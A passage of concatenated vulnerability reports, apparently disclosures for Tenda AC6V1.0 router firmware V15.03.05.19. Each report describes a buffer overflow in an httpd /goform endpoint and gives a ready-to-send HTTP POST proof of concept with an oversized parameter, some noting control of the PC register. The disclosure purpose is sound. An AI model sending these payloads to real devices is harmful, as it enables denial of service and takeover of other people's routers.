aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```

![image-20221118151225120](images/03.png)

Using A*428 as padding, we can control the PC register.

![image-20221118163539415](images/04.png)
--------------------------------------------------------------------------------
/tenda_ac6/fromSetIpMacBind/fromSetIpMacBind.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/SetIpMacBind` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/SetIpMacBind` page. The details are shown below:

![image-20221118155739854](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/SetIpMacBind HTTP/1.1
Host: 192.168.204.133
Content-Length: 453
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

bindnum=1&list=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\n
```

![image-20221118151225120](images/03.png)

Using A*428 as padding, we can control the PC register.

![image-20221118163539415](images/04.png)
--------------------------------------------------------------------------------
/tenda_ac6/fromSetSysTime/fromSetSysTime.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the fromSetSysTime function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/SetSysTimeCfg` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/SetSysTimeCfg` page. The details are shown below:

![image-20221119094833763](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.204.133
Content-Length: 710
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

timeType=manual&time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-

```

![image-20221118151225120](images/03.png)

--------------------------------------------------------------------------------
/tenda_ac6/fromSetWirelessRepeat/fromSetWirelessRepeat.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/WifiExtraSet` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/WifiExtraSet` page. The details are shown below:

![image-20221119202100670](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/WifiExtraSet HTTP/1.1
Host: 192.168.204.133
Content-Length: 247
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

wifi_chkHz=1&wl_mode=wisp&wl_enbale=1&country_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk_key=11111111&security=wpapsk&wpapsk_type=wpa&wpapsk_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined
```

![image-20221118151225120](images/03.png)
--------------------------------------------------------------------------------
/tenda_ac6/saveParentControlInfo_deviceId/saveParentControlInfo_deviceid.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the saveParentControlInfo function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/saveParentControlInfo` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/saveParentControlInfo` page. The details are shown below:

![image-20221118151051075](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/saveParentControlInfo HTTP/1.1
Host: 192.168.204.133
Content-Length: 1157
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

deviceId=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA